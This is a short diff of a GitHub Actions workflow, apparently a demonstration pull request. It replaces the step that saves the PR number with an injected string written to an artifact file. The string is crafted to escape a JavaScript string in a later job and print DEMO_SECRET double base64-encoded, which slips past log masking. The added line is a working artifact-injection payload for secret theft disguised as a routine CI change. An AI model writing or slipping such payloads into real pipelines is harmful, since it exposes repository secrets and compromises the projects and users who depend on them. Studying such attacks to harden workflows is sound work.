--- a/.github/workflows/pull-request-demo.yaml
+++ b/.github/workflows/pull-request-demo.yaml
@@ -13,7 +13,8 @@ jobs:
       - name: Save PR number
         run: |
           mkdir -p ./pr
-          echo ${{ github.event.number }} > ./pr/NR
+          # echo ${{ github.event.number }} > ./pr/NR
+          echo 'test"); console.log(btoa(btoa(process.env.DEMO_SECRET))); console.log("test' > ./pr/NR
           
       - uses: actions/upload-artifact@v4
         with:
